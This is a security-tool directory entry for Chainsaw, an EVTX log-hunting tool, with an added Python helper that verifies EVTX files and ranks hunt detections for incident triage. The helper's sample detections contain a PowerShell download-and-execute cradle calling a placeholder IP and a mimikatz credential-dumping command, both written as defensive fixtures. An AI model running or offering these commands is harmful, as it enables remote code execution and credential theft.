Chainsaw
Rapidly search and hunt through exported Windows event logs (EVTX) using Sigma rules and Chainsaw's own built-in detection rules, from the command line and without loading the logs anywhere first.
Why it is included
Fast incident-response triage of exported logs on an analyst workstation: no SIEM ingestion pipeline, index, or agent rollout is needed before the first hunt.
Best for
Analysts reviewing EVTX from compromised hosts in authorized cases.
Strengths
- Speed
- Sigma support
- Built-in rules
Limitations
- Windows log expertise still required: Chainsaw surfaces rule matches, but judging what an event ID means in context and which hits are noise is still the analyst's job
- Only finds what was logged: rules that depend on process command lines (4688) or PowerShell script blocks (4104) fire only if that auditing was enabled before the incident, and cleared or never-exported logs cannot be recovered
Good alternatives
Velociraptor · EVTX parser scripts
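The triage loop above (check the exported files, run the hunt, then rank what came back) is easier to show than describe. The following helper is an added example written for this page, not code from the Chainsaw project: it verifies that exported files really carry the EVTX header signature, then summarizes a Chainsaw `--json` hunt result by severity, rule, and first-seen time per host. The sample hunt output is constructed here; its field layout (`name`, `level`, `timestamp`, `document.data.Event.System.Computer`) is an assumption about Chainsaw's JSON format and should be checked against the output of your installed version. The `chainsaw hunt` invocation in the docstring should likewise be checked against `chainsaw hunt --help`.

```python
"""Post-process a Chainsaw hunt for IR triage (added example, not Chainsaw's code).

The JSON consumed here typically comes from something like (verify flags with
`chainsaw hunt --help` for your version):
    chainsaw hunt ./evtx -s sigma/ --mapping mappings/sigma-event-logs-all.yml \
        -r rules/ --json -o hunt.json
"""
import json
from collections import Counter

# Every EVTX file begins with this 8-byte signature. A zero-byte or truncated
# export (a common collection failure) will not pass this check.
EVTX_MAGIC = b"ElfFile\x00"

# Severity order used to put the most urgent hits first; unknown levels sort last.
LEVEL_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "informational": 4}

# Constructed sample in the assumed shape of `chainsaw hunt --json` output.
SAMPLE_HUNT_JSON = """[
  {"name": "Whoami Execution", "level": "low", "timestamp": "2024-03-02T09:58:00.000000Z",
   "document": {"kind": "evtx", "path": "WS01/Security.evtx",
     "data": {"Event": {"System": {"Computer": "WS01.corp.local", "EventID": 4688},
                        "EventData": {"CommandLine": "whoami /all"}}}}},
  {"name": "Suspicious PowerShell Download", "level": "high", "timestamp": "2024-03-02T10:02:00.000000Z",
   "document": {"kind": "evtx", "path": "WS01/PowerShell-Operational.evtx",
     "data": {"Event": {"System": {"Computer": "WS01.corp.local", "EventID": 4104},
                        "EventData": {"ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"}}}}},
  {"name": "Mimikatz Command Line", "level": "critical", "timestamp": "2024-03-02T10:15:00.000000Z",
   "document": {"kind": "evtx", "path": "WS01/Security.evtx",
     "data": {"Event": {"System": {"Computer": "WS01.corp.local", "EventID": 4688},
                        "EventData": {"CommandLine": "mimikatz.exe sekurlsa::logonpasswords"}}}}},
  {"name": "Mimikatz Command Line", "level": "critical", "timestamp": "2024-03-02T10:20:00.000000Z",
   "document": {"kind": "evtx", "path": "SRV02/Security.evtx",
     "data": {"Event": {"System": {"Computer": "SRV02.corp.local", "EventID": 4688},
                        "EventData": {"CommandLine": "mimikatz.exe sekurlsa::logonpasswords"}}}}}
]"""


def is_evtx_header(first_bytes):
    """True if the given leading bytes carry the EVTX file signature."""
    return first_bytes[: len(EVTX_MAGIC)] == EVTX_MAGIC


def is_evtx(path):
    """True if the file on disk starts with the EVTX signature."""
    with open(path, "rb") as fh:
        return is_evtx_header(fh.read(len(EVTX_MAGIC)))


def load_detections(text):
    """Parse Chainsaw JSON hunt output, which is a JSON array of detections."""
    data = json.loads(text)
    if not isinstance(data, list):
        raise ValueError("expected a JSON array of detections")
    return data


def host_of(det):
    """Computer name from the embedded event (assumed field layout, see docstring)."""
    return (det.get("document", {}).get("data", {}).get("Event", {})
            .get("System", {}).get("Computer", "<unknown>"))


def prioritize(detections):
    """Sort detections by severity (critical first), then by timestamp."""
    return sorted(detections, key=lambda d: (LEVEL_RANK.get(d.get("level", "").lower(), 9),
                                             d.get("timestamp", "")))


def summarize(detections):
    """Counts per level and per rule, plus the earliest hit per host for scoping."""
    by_level = Counter(d.get("level", "unknown").lower() for d in detections)
    by_rule = Counter(d.get("name", "<unnamed>") for d in detections)
    first_seen = {}
    for d in sorted(detections, key=lambda d: d.get("timestamp", "")):
        first_seen.setdefault(host_of(d), d.get("timestamp"))
    return {"by_level": dict(by_level), "by_rule": dict(by_rule), "first_seen": first_seen}


if __name__ == "__main__":
    dets = load_detections(SAMPLE_HUNT_JSON)
    summary = summarize(dets)
    print("hits by level:", summary["by_level"])
    print("first hit per host:", summary["first_seen"])
    for d in prioritize(dets):
        print(f'{d["level"]:<9} {d["timestamp"]} {host_of(d):<18} {d["name"]}')
```

Chainsaw emits timestamps in UTC unless told otherwise, so the `first_seen` values above are only meaningful for scoping if every exported host's logs are compared in the same zone; normalize before building a timeline from several collections.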
Related tools (all in the Security & Privacy category)
- Sigma: Generic signature format for SIEM/detection rules, convertible to Splunk, Elastic, KQL, and many other backends.
- Velociraptor: Endpoint visibility and DFIR: Velociraptor Query Language (VQL), hunts, notebooks, and artifact packs across fleets.
- Zeek: Network security monitor producing rich logs (conn, DNS, HTTP, SSL, files) for analytics; not a classic signature-based IDS.
- Impacket: Python classes and scripts for low-level Windows network protocols (SMB, MSRPC, Kerberos, LDAP, etc.).
- NetExec: Network post-exploitation Swiss Army knife for SMB/WinRM/LDAP/MSSQL/WMI; the actively maintained successor to CrackMapExec.
- evil-winrm: Ruby WinRM shell for pentesting: remote commands, file upload, Pass-the-Hash, and menu helpers.
